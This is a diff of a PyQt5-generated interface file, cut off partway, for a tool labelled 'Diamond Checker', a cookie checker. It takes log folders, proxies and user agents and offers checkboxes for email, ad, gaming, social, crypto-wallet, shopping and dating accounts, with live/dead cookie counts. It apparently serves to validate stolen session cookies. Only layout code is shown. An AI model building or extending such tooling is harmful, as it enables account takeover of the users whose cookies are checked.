QtGui.QFont() - font.setFamily("Furore") - self.checkBox_battlenet.setFont(font) - self.checkBox_battlenet.setStyleSheet("") - self.checkBox_battlenet.setObjectName("checkBox_battlenet") - self.game_checkbox_gridlayout.addWidget(self.checkBox_battlenet, 2, 0, 1, 1) - self.inbox_tab_widget.addTab(self.game_tab, "") - self.social_network_tab = QtWidgets.QWidget() - self.social_network_tab.setObjectName("social_network_tab") - self.layoutWidget = QtWidgets.QWidget(self.social_network_tab) - self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 761, 231)) - self.layoutWidget.setObjectName("layoutWidget") - self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget) - self.gridLayout.setContentsMargins(0, 0, 0, 0) - self.gridLayout.setObjectName("gridLayout") - self.checkBox_instagram = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_instagram.setFont(font) - self.checkBox_instagram.setStyleSheet("") - self.checkBox_instagram.setObjectName("checkBox_instagram") - self.gridLayout.addWidget(self.checkBox_instagram, 0, 0, 1, 1) - self.myspace_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.myspace_checkbox.setEnabled(False) - font = QtGui.QFont() - font.setFamily("Arial") - self.myspace_checkbox.setFont(font) - self.myspace_checkbox.setObjectName("myspace_checkbox") - self.gridLayout.addWidget(self.myspace_checkbox, 2, 2, 1, 1) - self.reddit_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.reddit_checkbox.setEnabled(False) - self.reddit_checkbox.setObjectName("reddit_checkbox") - self.gridLayout.addWidget(self.reddit_checkbox, 1, 2, 1, 1) - self.linkedin_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.linkedin_checkbox.setEnabled(False) - self.linkedin_checkbox.setObjectName("linkedin_checkbox") - self.gridLayout.addWidget(self.linkedin_checkbox, 2, 3, 1, 2) - self.checkBox_discord = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_discord.setFont(font) - self.checkBox_discord.setStyleSheet("") - self.checkBox_discord.setObjectName("checkBox_discord") - self.gridLayout.addWidget(self.checkBox_discord, 2, 1, 1, 1) - self.kick_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.kick_checkbox.setObjectName("kick_checkbox") - self.gridLayout.addWidget(self.kick_checkbox, 5, 0, 1, 1) - self.checkBox_facebook_ads = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_facebook_ads.setFont(font) - self.checkBox_facebook_ads.setStyleSheet("") - self.checkBox_facebook_ads.setObjectName("checkBox_facebook_ads") - self.gridLayout.addWidget(self.checkBox_facebook_ads, 0, 2, 1, 1) - self.checkBox_tiktok = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_tiktok.setFont(font) - self.checkBox_tiktok.setStyleSheet("") - self.checkBox_tiktok.setObjectName("checkBox_tiktok") - self.gridLayout.addWidget(self.checkBox_tiktok, 2, 0, 1, 1) - self.twitch_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.twitch_checkbox.setEnabled(False) - self.twitch_checkbox.setObjectName("twitch_checkbox") - self.gridLayout.addWidget(self.twitch_checkbox, 0, 3, 1, 2) - self.pintrest_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.pintrest_checkbox.setEnabled(False) - self.pintrest_checkbox.setObjectName("pintrest_checkbox") - self.gridLayout.addWidget(self.pintrest_checkbox, 1, 0, 1, 1) - self.checkBox_youtube = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_youtube.setFont(font) - self.checkBox_youtube.setStyleSheet("") - self.checkBox_youtube.setObjectName("checkBox_youtube") - self.gridLayout.addWidget(self.checkBox_youtube, 0, 1, 1, 1) - self.vimeo_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.vimeo_checkbox.setObjectName("vimeo_checkbox") - self.gridLayout.addWidget(self.vimeo_checkbox, 5, 1, 1, 1) - self.rumble_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.rumble_checkbox.setEnabled(False) - self.rumble_checkbox.setObjectName("rumble_checkbox") - self.gridLayout.addWidget(self.rumble_checkbox, 5, 2, 1, 1) - self.localsapp_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.localsapp_checkbox.setEnabled(False) - self.localsapp_checkbox.setObjectName("localsapp_checkbox") - self.gridLayout.addWidget(self.localsapp_checkbox, 5, 3, 1, 1) - self.snapchat_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.snapchat_checkbox.setEnabled(False) - self.snapchat_checkbox.setObjectName("snapchat_checkbox") - self.gridLayout.addWidget(self.snapchat_checkbox, 1, 3, 1, 1) - self.patreon_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.patreon_checkbox.setEnabled(False) - self.patreon_checkbox.setObjectName("patreon_checkbox") - self.gridLayout.addWidget(self.patreon_checkbox, 5, 4, 1, 1) - self.checkBox_netflix = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_netflix.setFont(font) - self.checkBox_netflix.setStyleSheet("") - self.checkBox_netflix.setObjectName("checkBox_netflix") - self.gridLayout.addWidget(self.checkBox_netflix, 1, 1, 1, 1) - self.checkBox_vk = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_vk.setFont(font) - self.checkBox_vk.setStyleSheet("") - self.checkBox_vk.setObjectName("checkBox_vk") - self.gridLayout.addWidget(self.checkBox_vk, 1, 4, 1, 1) - self.inbox_tab_widget.addTab(self.social_network_tab, "") - self.crypto_wallets_tab = QtWidgets.QWidget() - self.crypto_wallets_tab.setObjectName("crypto_wallets_tab") - self.widget3 = QtWidgets.QWidget(self.crypto_wallets_tab) - self.widget3.setGeometry(QtCore.QRect(10, 10, 761, 221)) - self.widget3.setObjectName("widget3") - self.gridLayout_6 = QtWidgets.QGridLayout(self.widget3) - self.gridLayout_6.setContentsMargins(0, 0, 0, 0) - self.gridLayout_6.setObjectName("gridLayout_6") - self.checkBox_coinbase = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_coinbase.setFont(font) - self.checkBox_coinbase.setStyleSheet("") - self.checkBox_coinbase.setObjectName("checkBox_coinbase") - self.gridLayout_6.addWidget(self.checkBox_coinbase, 0, 0, 1, 1) - self.checkBox_kryptex = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_kryptex.setFont(font) - self.checkBox_kryptex.setStyleSheet("") - self.checkBox_kryptex.setObjectName("checkBox_kryptex") - self.gridLayout_6.addWidget(self.checkBox_kryptex, 0, 1, 1, 1) - self.checkBox_hitbtc = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_hitbtc.setFont(font) - self.checkBox_hitbtc.setStyleSheet("") - self.checkBox_hitbtc.setObjectName("checkBox_hitbtc") - self.gridLayout_6.addWidget(self.checkBox_hitbtc, 1, 0, 1, 1) - self.checkBox_freebitcoin = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_freebitcoin.setFont(font) - self.checkBox_freebitcoin.setStyleSheet("") - self.checkBox_freebitcoin.setObjectName("checkBox_freebitcoin") - self.gridLayout_6.addWidget(self.checkBox_freebitcoin, 2, 0, 1, 1) - self.inbox_tab_widget.addTab(self.crypto_wallets_tab, "") - self.shopping_tab = QtWidgets.QWidget() - self.shopping_tab.setObjectName("shopping_tab") - self.layoutWidget1 = QtWidgets.QWidget(self.shopping_tab) - self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 731, 211)) - self.layoutWidget1.setObjectName("layoutWidget1") - self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget1) - self.gridLayout_2.setContentsMargins(0, 0, 0, 0) - self.gridLayout_2.setObjectName("gridLayout_2") - self.checkBox_amazon = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_amazon.setFont(font) - self.checkBox_amazon.setStyleSheet("") - self.checkBox_amazon.setObjectName("checkBox_amazon") - self.gridLayout_2.addWidget(self.checkBox_amazon, 0, 0, 1, 1) - self.ebay_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.ebay_checkbox.setEnabled(False) - self.ebay_checkbox.setObjectName("ebay_checkbox") - self.gridLayout_2.addWidget(self.ebay_checkbox, 0, 1, 1, 1) - self.airbnb_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.airbnb_checkbox.setEnabled(False) - self.airbnb_checkbox.setObjectName("airbnb_checkbox") - self.gridLayout_2.addWidget(self.airbnb_checkbox, 0, 2, 1, 1) - self.envato_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.envato_checkbox.setEnabled(False) - self.envato_checkbox.setObjectName("envato_checkbox") - self.gridLayout_2.addWidget(self.envato_checkbox, 0, 3, 1, 1) - self.flipkart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.flipkart_checkbox.setEnabled(False) - self.flipkart_checkbox.setObjectName("flipkart_checkbox") - self.gridLayout_2.addWidget(self.flipkart_checkbox, 0, 4, 1, 1) - self.checkBox_funpay = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_funpay.setFont(font) - self.checkBox_funpay.setStyleSheet("") - self.checkBox_funpay.setObjectName("checkBox_funpay") - self.gridLayout_2.addWidget(self.checkBox_funpay, 1, 0, 1, 1) - self.kleinanzeigen_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.kleinanzeigen_checkbox.setEnabled(False) - self.kleinanzeigen_checkbox.setObjectName("kleinanzeigen_checkbox") - self.gridLayout_2.addWidget(self.kleinanzeigen_checkbox, 1, 1, 1, 1) - self.booking_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.booking_checkbox.setEnabled(False) - self.booking_checkbox.setObjectName("booking_checkbox") - self.gridLayout_2.addWidget(self.booking_checkbox, 1, 2, 1, 1) - self.uber_eats_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.uber_eats_checkbox.setEnabled(False) - self.uber_eats_checkbox.setObjectName("uber_eats_checkbox") - self.gridLayout_2.addWidget(self.uber_eats_checkbox, 1, 3, 1, 1) - self.dh_gate_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.dh_gate_checkbox.setEnabled(False) - self.dh_gate_checkbox.setObjectName("dh_gate_checkbox") - self.gridLayout_2.addWidget(self.dh_gate_checkbox, 1, 4, 1, 1) - self.checkBox_humble = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_humble.setFont(font) - self.checkBox_humble.setStyleSheet("") - self.checkBox_humble.setObjectName("checkBox_humble") - self.gridLayout_2.addWidget(self.checkBox_humble, 2, 0, 1, 1) - self.temu_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.temu_checkbox.setEnabled(False) - self.temu_checkbox.setObjectName("temu_checkbox") - self.gridLayout_2.addWidget(self.temu_checkbox, 2, 1, 1, 1) - self.fiverr_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.fiverr_checkbox.setEnabled(False) - self.fiverr_checkbox.setObjectName("fiverr_checkbox") - self.gridLayout_2.addWidget(self.fiverr_checkbox, 2, 2, 1, 1) - self.zillow_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.zillow_checkbox.setEnabled(False) - self.zillow_checkbox.setObjectName("zillow_checkbox") - self.gridLayout_2.addWidget(self.zillow_checkbox, 2, 3, 1, 1) - self.instacart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.instacart_checkbox.setEnabled(False) - self.instacart_checkbox.setObjectName("instacart_checkbox") - self.gridLayout_2.addWidget(self.instacart_checkbox, 2, 4, 1, 1) - self.google_play_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.google_play_checkbox.setObjectName("google_play_checkbox") - self.gridLayout_2.addWidget(self.google_play_checkbox, 3, 0, 1, 1) - self.vinted_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.vinted_checkbox.setEnabled(False) - self.vinted_checkbox.setObjectName("vinted_checkbox") - self.gridLayout_2.addWidget(self.vinted_checkbox, 3, 1, 1, 1) - self.walmart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.walmart_checkbox.setEnabled(False) - self.walmart_checkbox.setObjectName("walmart_checkbox") - self.gridLayout_2.addWidget(self.walmart_checkbox, 3, 2, 1, 1) - self.inbox_tab_widget.addTab(self.shopping_tab, "") - self.daiting_tab = QtWidgets.QWidget() - self.daiting_tab.setObjectName("daiting_tab") - self.widget4 = QtWidgets.QWidget(self.daiting_tab) - self.widget4.setGeometry(QtCore.QRect(20, 0, 751, 221)) - self.widget4.setObjectName("widget4") - self.gridLayout_5 = QtWidgets.QGridLayout(self.widget4) - self.gridLayout_5.setContentsMargins(0, 0, 0, 0) - self.gridLayout_5.setObjectName("gridLayout_5") - self.ashley_madison_checkbox = QtWidgets.QCheckBox(self.widget4) - self.ashley_madison_checkbox.setEnabled(False) - self.ashley_madison_checkbox.setObjectName("ashley_madison_checkbox") - self.gridLayout_5.addWidget(self.ashley_madison_checkbox, 0, 0, 1, 1) - self.zoosk_checkbox = QtWidgets.QCheckBox(self.widget4) - self.zoosk_checkbox.setEnabled(False) - self.zoosk_checkbox.setObjectName("zoosk_checkbox") - self.gridLayout_5.addWidget(self.zoosk_checkbox, 0, 1, 1, 1) - self.meetme_checkbox = QtWidgets.QCheckBox(self.widget4) - self.meetme_checkbox.setEnabled(False) - self.meetme_checkbox.setObjectName("meetme_checkbox") - self.gridLayout_5.addWidget(self.meetme_checkbox, 0, 2, 1, 1) - self.eharmony_checkbox = QtWidgets.QCheckBox(self.widget4) - self.eharmony_checkbox.setEnabled(False) - self.eharmony_checkbox.setObjectName("eharmony_checkbox") - self.gridLayout_5.addWidget(self.eharmony_checkbox, 1, 0, 1, 1) - self.tinder_checkbox = QtWidgets.QCheckBox(self.widget4) - self.tinder_checkbox.setEnabled(False) - self.tinder_checkbox.setObjectName("tinder_checkbox") - self.gridLayout_5.addWidget(self.tinder_checkbox, 1, 1, 1, 1) - self.christan_mingle_checkbox = QtWidgets.QCheckBox(self.widget4) - self.christan_mingle_checkbox.setEnabled(False) - self.christan_mingle_checkbox.setObjectName("christan_mingle_checkbox") - self.gridLayout_5.addWidget(self.christan_mingle_checkbox, 1, 2, 1, 1) - self.inbox_tab_widget.addTab(self.daiting_tab, "") - self.number_of_label = QtWidgets.QLabel(self.centralwidget) - self.number_of_label.setGeometry(QtCore.QRect(540, 280, 71, 31)) - self.number_of_label.setObjectName("number_of_label") - self.files_label = QtWidgets.QLabel(self.centralwidget) - self.files_label.setGeometry(QtCore.QRect(540, 310, 71, 31)) - self.files_label.setObjectName("files_label") - self.folders_label = QtWidgets.QLabel(self.centralwidget) - self.folders_label.setGeometry(QtCore.QRect(540, 340, 71, 31)) - self.folders_label.setObjectName("folders_label") - self.cookies_label = QtWidgets.QLabel(self.centralwidget) - self.cookies_label.setGeometry(QtCore.QRect(540, 380, 71, 21)) - self.cookies_label.setObjectName("cookies_label") - self.cookie_stats_label = QtWidgets.QLabel(self.centralwidget) - self.cookie_stats_label.setGeometry(QtCore.QRect(700, 290, 81, 21)) - self.cookie_stats_label.setObjectName("cookie_stats_label") - self.live_label = QtWidgets.QLabel(self.centralwidget) - self.live_label.setGeometry(QtCore.QRect(700, 320, 71, 21)) - self.live_label.setObjectName("live_label") - self.dead_label = QtWidgets.QLabel(self.centralwidget) - self.dead_label.setGeometry(QtCore.QRect(700, 350, 71, 21)) - self.dead_label.setObjectName("dead_label") - self.errors_label = QtWidgets.QLabel(self.centralwidget) - self.errors_label.setGeometry(QtCore.QRect(700, 380, 71, 21)) - self.errors_label.setObjectName("errors_label") - self.stats_box.raise_() - self.lineEdit_dir.raise_() - self.lineEdit_proxy.raise_() - self.lineEdit_ua.raise_() - self.checkBox_ua.raise_() - self.label_2.raise_() - self.pushButton.raise_() - self.progressBar.raise_() - self.pushButton_dir_logs.raise_() - self.pushButton_proxies_files.raise_() - self.pushButton_useragents_file.raise_() - self.textEdit_console.raise_() - self.social_network_label.raise_() - self.spinBox_thr.raise_() - self.label_lgbt.raise_() - self.comboBox_proxy.raise_() - self.inbox_tab_widget.raise_() - self.number_of_label.raise_() - self.files_label.raise_() - self.folders_label.raise_() - self.cookies_label.raise_() - self.cookie_stats_label.raise_() - self.live_label.raise_() - self.dead_label.raise_() - self.errors_label.raise_() - MainWindow.setCentralWidget(self.centralwidget) - self.statusbar = QtWidgets.QStatusBar(MainWindow) - self.statusbar.setObjectName("statusbar") - MainWindow.setStatusBar(self.statusbar) - - self.retranslateUi(MainWindow) - self.inbox_tab_widget.setCurrentIndex(0) - self.pushButton_proxies_files.clicked.connect(MainWindow.proxies_file) # type: ignore - self.pushButton_dir_logs.clicked.connect(MainWindow.dir_logs) # type: ignore - self.pushButton_useragents_file.clicked.connect(MainWindow.useragents_file) # type: ignore - QtCore.QMetaObject.connectSlotsByName(MainWindow) - - def retranslateUi(self, MainWindow): - _translate = QtCore.QCoreApplication.translate - MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) - self.lineEdit_dir.setText(_translate("MainWindow", "The path to the logs")) - self.lineEdit_proxy.setText(_translate("MainWindow", "The path to the proxy")) - self.lineEdit_ua.setText(_translate("MainWindow", "The path to user agents")) - self.checkBox_ua.setText(_translate("MainWindow", "Enable")) - self.pushButton.setText(_translate("MainWindow", "Start")) - self.pushButton_dir_logs.setText(_translate("MainWindow", "Choose a path")) - self.pushButton_proxies_files.setText(_translate("MainWindow", "Choose a path")) - self.pushButton_useragents_file.setText(_translate("MainWindow", "Choose a path")) - self.textEdit_console.setHtml(_translate("MainWindow", "\n" -"\n" -"


")) - self.textEdit_console.setPlaceholderText(_translate("MainWindow", "Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project")) - self.social_network_label.setText(_translate("MainWindow", "Threads")) - self.comboBox_proxy.setItemText(0, _translate("MainWindow", "off")) - self.comboBox_proxy.setItemText(1, _translate("MainWindow", "socks4")) - self.comboBox_proxy.setItemText(2, _translate("MainWindow", "socks5")) - self.comboBox_proxy.setItemText(3, _translate("MainWindow", "http")) - self.gmail_inbox_checkbox.setText(_translate("MainWindow", "Gmail")) - self.yandex_checkbox.setText(_translate("MainWindow", "Yandex")) - self.yahoo_checkbox.setText(_translate("MainWindow", "Yahoo")) - self.outlook_checkbox.setText(_translate("MainWindow", "Outlook")) - self.webmail_checkbox.setText(_translate("MainWindow", "Webmail")) - self.mailru_checkbox.setText(_translate("MainWindow", "Mail.Ru")) - self.cpanel_checkbox.setText(_translate("MainWindow", "Cpanel")) - self.office_checkbox.setText(_translate("MainWindow", "Office")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.inbox_tab), _translate("MainWindow", "Inbox")) - self.bing_ads_checkbox.setText(_translate("MainWindow", "Bing Ads")) - self.reddit_ads__checkbox.setText(_translate("MainWindow", "Reddit Ads")) - self.ahref_checkbox.setText(_translate("MainWindow", "AHref SEO")) - self.snapchat_ads_checkbox.setText(_translate("MainWindow", "Snapchat Ads")) - self.tinder_ads_checkbox.setText(_translate("MainWindow", "Tinder Ads")) - self.twitter_ads_checkbox.setText(_translate("MainWindow", "Twitter Ads")) - self.sem_rush_checkbox.setText(_translate("MainWindow", "SEM Rush")) - self.craigslist_ads_checkbox.setText(_translate("MainWindow", "Craigslist Ads")) - self.facebookads__checkbox.setText(_translate("MainWindow", "Facebook Ads")) - self.microsoft_ads_checkbox.setText(_translate("MainWindow", "Microsoft Ads")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.ads_tab), _translate("MainWindow", "Ads")) - self.checkBox_steam.setText(_translate("MainWindow", "Steam")) - self.checkBox_pathofexile.setText(_translate("MainWindow", "PathofExile")) - self.checkBox_roblox.setText(_translate("MainWindow", "Roblox")) - self.checkBox_battlenet.setText(_translate("MainWindow", "BattleNet")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.game_tab), _translate("MainWindow", "Games")) - self.checkBox_instagram.setText(_translate("MainWindow", "Instagram")) - self.myspace_checkbox.setText(_translate("MainWindow", "Myspace")) - self.reddit_checkbox.setText(_translate("MainWindow", "Reddit")) - self.linkedin_checkbox.setText(_translate("MainWindow", "LinkedIn")) - self.checkBox_discord.setText(_translate("MainWindow", "Discord")) - self.kick_checkbox.setText(_translate("MainWindow", "Kick")) - self.checkBox_facebook_ads.setText(_translate("MainWindow", "Facebook")) - self.checkBox_tiktok.setText(_translate("MainWindow", "TikTok")) - self.twitch_checkbox.setText(_translate("MainWindow", "Twitch")) - self.pintrest_checkbox.setText(_translate("MainWindow", "Pintrest")) - self.checkBox_youtube.setText(_translate("MainWindow", "YouTube")) - self.vimeo_checkbox.setText(_translate("MainWindow", "Vimeo")) - self.rumble_checkbox.setText(_translate("MainWindow", "Rumble")) - self.localsapp_checkbox.setText(_translate("MainWindow", "Locals")) - self.snapchat_checkbox.setText(_translate("MainWindow", "Snapchat")) - self.patreon_checkbox.setText(_translate("MainWindow", "Patreon")) - self.checkBox_netflix.setText(_translate("MainWindow", "Netflix")) - self.checkBox_vk.setText(_translate("MainWindow", "VK")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.social_network_tab), _translate("MainWindow", "Social network")) - self.checkBox_coinbase.setText(_translate("MainWindow", "CoinBase")) - self.checkBox_kryptex.setText(_translate("MainWindow", "Kryptex")) - self.checkBox_hitbtc.setText(_translate("MainWindow", "HitBTC")) - self.checkBox_freebitcoin.setText(_translate("MainWindow", "FreeBitcoin")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.crypto_wallets_tab), _translate("MainWindow", "Crypto wallet")) - self.checkBox_amazon.setText(_translate("MainWindow", "Amazon")) - self.ebay_checkbox.setText(_translate("MainWindow", "Ebay")) - self.airbnb_checkbox.setText(_translate("MainWindow", "AirBNB")) - self.envato_checkbox.setText(_translate("MainWindow", "Envato Elements")) - self.flipkart_checkbox.setText(_translate("MainWindow", "Flipkart")) - self.checkBox_funpay.setText(_translate("MainWindow", "FunPay")) - self.kleinanzeigen_checkbox.setText(_translate("MainWindow", "Kleinanzeigen")) - self.booking_checkbox.setText(_translate("MainWindow", "Booking.com")) - self.uber_eats_checkbox.setText(_translate("MainWindow", "Uber Eats")) - self.dh_gate_checkbox.setText(_translate("MainWindow", "DH Gate")) - self.checkBox_humble.setText(_translate("MainWindow", "Humble")) - self.temu_checkbox.setText(_translate("MainWindow", "Temu")) - self.fiverr_checkbox.setText(_translate("MainWindow", "Fiverr")) - self.zillow_checkbox.setText(_translate("MainWindow", "Zillow")) - self.instacart_checkbox.setText(_translate("MainWindow", "Instacart")) - self.google_play_checkbox.setText(_translate("MainWindow", "Google Play")) - self.vinted_checkbox.setText(_translate("MainWindow", "Vinted")) - self.walmart_checkbox.setText(_translate("MainWindow", "Walmart")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.shopping_tab), _translate("MainWindow", "Shop")) - self.ashley_madison_checkbox.setText(_translate("MainWindow", "AshleyMaddison")) - self.zoosk_checkbox.setText(_translate("MainWindow", "Zoosk")) - self.meetme_checkbox.setText(_translate("MainWindow", "MeetMe")) - self.eharmony_checkbox.setText(_translate("MainWindow", "EHarmony")) - self.tinder_checkbox.setText(_translate("MainWindow", "Tinder")) - self.christan_mingle_checkbox.setText(_translate("MainWindow", "ChristanMingle")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.daiting_tab), _translate("MainWindow", "Daiting")) - self.number_of_label.setText(_translate("MainWindow", "Number of:")) - self.files_label.setText(_translate("MainWindow", "Files:")) - self.folders_label.setText(_translate("MainWindow", "Folders:")) - self.cookies_label.setText(_translate("MainWindow", "Cookies:")) - self.cookie_stats_label.setText(_translate("MainWindow", "Cookie Stats:")) - self.live_label.setText(_translate("MainWindow", "Live:")) - self.dead_label.setText(_translate("MainWindow", "Dead:")) - self.errors_label.setText(_translate("MainWindow", "Errors:")) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec_()) +# -*- coding: utf-8 -*- + +# Form implementation generated from reading ui file 'main_ui.ui' +# +# Created by: PyQt5 UI code generator 5.15.10 +# +# WARNING: Any manual changes made to this file will be lost when pyuic5 is +# run again. Do not edit this file unless you know what you are doing. + + +from PyQt5 import QtCore, QtGui, QtWidgets + + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName("MainWindow") + MainWindow.resize(801, 820) + MainWindow.setMinimumSize(QtCore.QSize(801, 677)) + MainWindow.setMaximumSize(QtCore.QSize(801, 999)) + MainWindow.setSizeIncrement(QtCore.QSize(801, 677)) + MainWindow.setBaseSize(QtCore.QSize(801, 677)) + MainWindow.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.centralwidget = QtWidgets.QWidget(MainWindow) + self.centralwidget.setObjectName("centralwidget") + self.lineEdit_dir = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_dir.setGeometry(QtCore.QRect(10, 280, 421, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_dir.setFont(font) + self.lineEdit_dir.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + self.lineEdit_dir.setObjectName("lineEdit_dir") + self.lineEdit_proxy = QtWidgets.QLineEdit(self.centralwidget) + self.lineEdit_proxy.setGeometry(QtCore.QRect(10, 320, 331, 31)) + font = QtGui.QFont() + font.setFamily("Furore") + font.setPointSize(10) + self.lineEdit_proxy.setFont(font) + self.lineEdit_proxy.setStyleSheet("QLineEdit,\n" +"QComboBox,\n" +"QDateTimeEdit,\n" +"QSpinBox,\n" +"QDoubleSpinBox {\n" +" color: #1de9b6;\n" +" background-color: #31363b;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 4px;\n" +" height: 32px;\n" +"}\n" +"\n" +"QWidget {\n" +" background-color: #232629;\n" +" color: #ffffff;\n" +"}\n" +"\n" +"QGroupBox,\n" +"QFrame {\n" +" background-color: #232629;\n" +" border: 2px solid #4f5b62;\n" +" border-radius: 4px;\n" +"}\n" +"\n" +"QRadioButton::indicator,\n" +"QCheckBox::indicator {\n" +" width: 16px;\n" +" height: 16px;\n" +" border: 2px solid #1de9b6;\n" +" border-radius: 0;\n" +" transform: rotate(45deg);\n" +" transform-origin: center;\n" +"}\n" +"\n" +"QRadioButton::indicator:checked,\n" +"QCheckBox::indicator:checked {\n" +" background-color: #1de9b6;\n" +" border-color: #1de9b6;\n" +"}\n" +"\n" +"QRadioButton::indicator:hover,\n" +"QCheckBox::indicator:hover {\n" +" border-color: rgba(29, 233, 182, 0.8);\n" +"}\n" +"\n" +"QRadioButton::indicator:checked:hover,\n" +"QCheckBox::indicator:checked:hover {\n" +" border-color: #1de9b6;\n" +"}") + 